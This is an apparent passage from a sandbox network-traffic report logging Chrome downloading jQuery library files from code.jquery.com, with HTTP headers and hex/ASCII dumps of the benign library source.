                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:17 UTC613INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 86709
                                                                                                                                          Server: nginx
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                          ETag: "28feccc0-152b5"
                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:16 GMT
                                                                                                                                          Age: 1309408
                                                                                                                                          X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740065-EWR
                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                          X-Cache-Hits: 4188, 4
                                                                                                                                          X-Timer: S1732789937.851650,VS0,VE0
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          2024-11-28 10:32:17 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77
                                                                                                                                          Data Ascii: /*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
                                                                                                                                          2024-11-28 10:32:17 UTC16384INData Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74
                                                                                                                                          Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d||t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||ga.error("unsupported pseudo: "+a);ret
                                                                                                                                          2024-11-28 10:32:17 UTC16384INData Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65
                                                                                                                                          Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b||(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
                                                                                                                                          2024-11-28 10:32:17 UTC16384INData Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28
                                                                                                                                          Data Ascii: e&&9!==this.nodeType||(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
                                                                                                                                          2024-11-28 10:32:17 UTC16384INData Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63
                                                                                                                                          Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
                                                                                                                                          2024-11-28 10:32:17 UTC4789INData Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62
                                                                                                                                          Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h||"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.449756151.101.130.1374432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:17 UTC354OUTGET /jquery-3.3.1.js HTTP/1.1
                                                                                                                                          Host: code.jquery.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:17 UTC612INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 271751
                                                                                                                                          Server: nginx
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                          ETag: "28feccc0-42587"
                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Age: 782835
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:17 GMT
                                                                                                                                          X-Served-By: cache-lga21980-LGA, cache-nyc-kteb1890093-NYC
                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                          X-Cache-Hits: 312, 0
                                                                                                                                          X-Timer: S1732789937.310808,VS0,VE1
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 33 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 38 2d 30 31 2d 32 30 54 31 37
                                                                                                                                          Data Ascii: /*! * jQuery JavaScript Library v3.3.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2018-01-20T17
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 2e 20 42 75 74 20 61 73 20 6f 66 20 6a 51 75 65 72 79 20 33 2e 30 20 28 32 30 31 36 29 2c 20 73 74 72 69 63 74 20 6d 6f 64 65 20 73 68 6f 75 6c 64 20 62 65 20 63 6f 6d 6d 6f 6e 0a 2f 2f 20 65 6e 6f 75 67 68 20 74 68 61 74 20 61 6c 6c 20 73 75 63 68 20 61 74 74 65 6d 70 74 73 20 61 72 65 20 67 75 61 72 64 65 64 20 69 6e 20 61 20 74 72 79 20 62 6c 6f 63 6b 2e 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 64 6f 63 75 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 0a 0a 76 61 72 20 67 65 74 50 72 6f 74 6f 20 3d 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 63 6f 6e 63
                                                                                                                                          Data Ascii: . But as of jQuery 3.0 (2016), strict mode should be common// enough that all such attempts are guarded in a try block."use strict";var arr = [];var document = window.document;var getProto = Object.getPrototypeOf;var slice = arr.slice;var conc
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 63 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 0a 09 7d 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 74 6f 54 79 70 65 28 20 6f 62 6a 20 29 20 7b 0a 09 69 66 20 28 20 6f 62 6a 20 3d 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 6f 62 6a 20 2b 20 22 22 3b 0a 09 7d 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 41 6e 64 72 6f 69 64 20 3c 3d 32 2e 33 20 6f 6e 6c 79 20 28 66 75 6e 63 74 69 6f 6e 69 73 68 20 52 65 67 45 78 70 29 0a 09 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 7c 7c 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3f 0a 09
                                                                                                                                          Data Ascii: c.head.appendChild( script ).parentNode.removeChild( script );}function toType( obj ) {if ( obj == null ) {return obj + "";}// Support: Android <=2.3 only (functionish RegExp)return typeof obj === "object" || typeof obj === "function" ?
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 7b 0a 09 09 09 72 65 74 75 72 6e 20 73 6c 69 63 65 2e 63 61 6c 6c 28 20 74 68 69 73 20 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 52 65 74 75 72 6e 20 6a 75 73 74 20 74 68 65 20 6f 6e 65 20 65 6c 65 6d 65 6e 74 20 66 72 6f 6d 20 74 68 65 20 73 65 74 0a 09 09 72 65 74 75 72 6e 20 6e 75 6d 20 3c 20 30 20 3f 20 74 68 69 73 5b 20 6e 75 6d 20 2b 20 74 68 69 73 2e 6c 65 6e 67 74 68 20 5d 20 3a 20 74 68 69 73 5b 20 6e 75 6d 20 5d 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 54 61 6b 65 20 61 6e 20 61 72 72 61 79 20 6f 66 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 70 75 73 68 20 69 74 20 6f 6e 74 6f 20 74 68 65 20 73 74 61 63 6b 0a 09 2f 2f 20 28 72 65 74 75 72 6e 69 6e 67 20 74 68 65 20 6e 65 77 20 6d 61 74 63 68 65 64 20 65 6c 65 6d 65 6e 74 20 73 65 74 29 0a 09 70 75 73 68 53
                                                                                                                                          Data Ascii: {return slice.call( this );}// Return just the one element from the setreturn num < 0 ? this[ num + this.length ] : this[ num ];},// Take an array of elements and push it onto the stack// (returning the new matched element set)pushS
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 65 72 79 2e 66 6e 2e 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 6f 70 74 69 6f 6e 73 2c 20 6e 61 6d 65 2c 20 73 72 63 2c 20 63 6f 70 79 2c 20 63 6f 70 79 49 73 41 72 72 61 79 2c 20 63 6c 6f 6e 65 2c 0a 09 09 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 20 30 20 5d 20 7c 7c 20 7b 7d 2c 0a 09 09 69 20 3d 20 31 2c 0a 09 09 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 0a 09 09 64 65 65 70 20 3d 20 66 61 6c 73 65 3b 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 20 61 20 64 65 65 70 20 63 6f 70 79 20 73 69 74 75 61 74 69 6f 6e 0a 09 69 66 20 28 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 3d 3d 3d 20 22 62 6f 6f 6c 65 61 6e 22 20 29 20 7b 0a 09 09 64 65 65 70 20 3d 20 74 61 72 67 65 74 3b
                                                                                                                                          Data Ascii: ery.fn.extend = function() {var options, name, src, copy, copyIsArray, clone,target = arguments[ 0 ] || {},i = 1,length = arguments.length,deep = false;// Handle a deep copy situationif ( typeof target === "boolean" ) {deep = target;
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 65 2c 20 63 6f 70 79 20 29 3b 0a 0a 09 09 09 09 2f 2f 20 44 6f 6e 27 74 20 62 72 69 6e 67 20 69 6e 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 73 0a 09 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 63 6f 70 79 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 29 20 7b 0a 09 09 09 09 09 74 61 72 67 65 74 5b 20 6e 61 6d 65 20 5d 20 3d 20 63 6f 70 79 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 52 65 74 75 72 6e 20 74 68 65 20 6d 6f 64 69 66 69 65 64 20 6f 62 6a 65 63 74 0a 09 72 65 74 75 72 6e 20 74 61 72 67 65 74 3b 0a 7d 3b 0a 0a 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 20 7b 0a 0a 09 2f 2f 20 55 6e 69 71 75 65 20 66 6f 72 20 65 61 63 68 20 63 6f 70 79 20 6f 66 20 6a 51 75 65 72 79 20 6f 6e 20 74 68 65 20 70 61 67 65 0a 09 65
                                                                                                                                          Data Ascii: e, copy );// Don't bring in undefined values} else if ( copy !== undefined ) {target[ name ] = copy;}}}}// Return the modified objectreturn target;};jQuery.extend( {// Unique for each copy of jQuery on the pagee
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 09 09 44 4f 4d 45 76 61 6c 28 20 63 6f 64 65 20 29 3b 0a 09 7d 2c 0a 0a 09 65 61 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 20 6f 62 6a 2c 20 63 61 6c 6c 62 61 63 6b 20 29 20 7b 0a 09 09 76 61 72 20 6c 65 6e 67 74 68 2c 20 69 20 3d 20 30 3b 0a 0a 09 09 69 66 20 28 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 29 20 7b 0a 09 09 09 6c 65 6e 67 74 68 20 3d 20 6f 62 6a 2e 6c 65 6e 67 74 68 3b 0a 09 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 6f 62 6a 5b 20 69 20 5d 2c 20 69 2c 20 6f 62 6a 5b 20 69 20 5d 20 29 20 3d 3d 3d 20 66 61 6c 73 65 20 29 20 7b 0a 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 20
                                                                                                                                          Data Ascii: DOMEval( code );},each: function( obj, callback ) {var length, i = 0;if ( isArrayLike( obj ) ) {length = obj.length;for ( ; i < length; i++ ) {if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) {break;}}}
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 62 61 63 6b 45 78 70 65 63 74 20 3d 20 21 69 6e 76 65 72 74 3b 0a 0a 09 09 2f 2f 20 47 6f 20 74 68 72 6f 75 67 68 20 74 68 65 20 61 72 72 61 79 2c 20 6f 6e 6c 79 20 73 61 76 69 6e 67 20 74 68 65 20 69 74 65 6d 73 0a 09 09 2f 2f 20 74 68 61 74 20 70 61 73 73 20 74 68 65 20 76 61 6c 69 64 61 74 6f 72 20 66 75 6e 63 74 69 6f 6e 0a 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 3d 20 21 63 61 6c 6c 62 61 63 6b 28 20 65 6c 65 6d 73 5b 20 69 20 5d 2c 20 69 20 29 3b 0a 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 21 3d 3d 20 63 61 6c 6c 62 61 63 6b 45 78 70 65 63 74 20 29 20 7b 0a 09 09 09 09 6d 61 74 63 68 65 73 2e 70 75 73 68 28 20 65
                                                                                                                                          Data Ascii: backExpect = !invert;// Go through the array, only saving the items// that pass the validator functionfor ( ; i < length; i++ ) {callbackInverse = !callback( elems[ i ], i );if ( callbackInverse !== callbackExpect ) {matches.push( e
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 2c 20 6e 61 6d 65 20 29 20 7b 0a 09 63 6c 61 73 73 32 74 79 70 65 5b 20 22 5b 6f 62 6a 65 63 74 20 22 20 2b 20 6e 61 6d 65 20 2b 20 22 5d 22 20 5d 20 3d 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 7d 20 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 7b 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 72 65 61 6c 20 69 4f 53 20 38 2e 32 20 6f 6e 6c 79 20 28 6e 6f 74 20 72 65 70 72 6f 64 75 63 69 62 6c 65 20 69 6e 20 73 69 6d 75 6c 61 74 6f 72 29 0a 09 2f 2f 20 60 69 6e 60 20 63 68 65 63 6b 20 75 73 65 64 20 74 6f 20 70 72 65 76 65 6e 74 20 4a 49 54 20 65 72 72 6f 72 20 28 67 68 2d 32 31 34 35 29 0a 09 2f 2f 20 68 61 73 4f 77 6e 20 69 73 6e 27 74 20 75 73 65 64 20 68 65 72 65 20 64 75 65 20 74
                                                                                                                                          Data Ascii: , name ) {class2type[ "[object " + name + "]" ] = name.toLowerCase();} );function isArrayLike( obj ) {// Support: real iOS 8.2 only (not reproducible in simulator)// `in` check used to prevent JIT error (gh-2145)// hasOwn isn't used here due t
                                                                                                                                          2024-11-28 10:32:17 UTC1378INData Raw: 6e 73 74 61 6e 63 65 20 6d 65 74 68 6f 64 73 0a 09 68 61 73 4f 77 6e 20 3d 20 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 0a 09 61 72 72 20 3d 20 5b 5d 2c 0a 09 70 6f 70 20 3d 20 61 72 72 2e 70 6f 70 2c 0a 09 70 75 73 68 5f 6e 61 74 69 76 65 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 70 75 73 68 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 2c 0a 09 2f 2f 20 55 73 65 20 61 20 73 74 72 69 70 70 65 64 2d 64 6f 77 6e 20 69 6e 64 65 78 4f 66 20 61 73 20 69 74 27 73 20 66 61 73 74 65 72 20 74 68 61 6e 20 6e 61 74 69 76 65 0a 09 2f 2f 20 68 74 74 70 73 3a 2f 2f 6a 73 70 65 72 66 2e 63 6f 6d 2f 74 68 6f 72 2d 69 6e 64 65 78 6f 66 2d 76 73 2d 66 6f 72 2f 35 0a 09 69 6e 64 65 78 4f 66 20 3d 20 66 75 6e
                                                                                                                                          Data Ascii: nstance methodshasOwn = ({}).hasOwnProperty,arr = [],pop = arr.pop,push_native = arr.push,push = arr.push,slice = arr.slice,// Use a stripped-down indexOf as it's faster than native// https://jsperf.com/thor-indexof-vs-for/5indexOf = fun


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.449758151.101.130.1374432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:17 UTC363OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                                                                          Host: code.jquery.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:17 UTC611INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 69597
                                                                                                                                          Server: nginx
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                          ETag: "28feccc0-10fdd"
                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Age: 772672
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:17 GMT
                                                                                                                                          X-Served-By: cache-lga21984-LGA, cache-nyc-kteb1890020-NYC
                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                          X-Cache-Hits: 903, 0
                                                                                                                                          X-Timer: S1732789938.568116,VS0,VE1
                                                                                                                                          Vary: Accept-Encoding
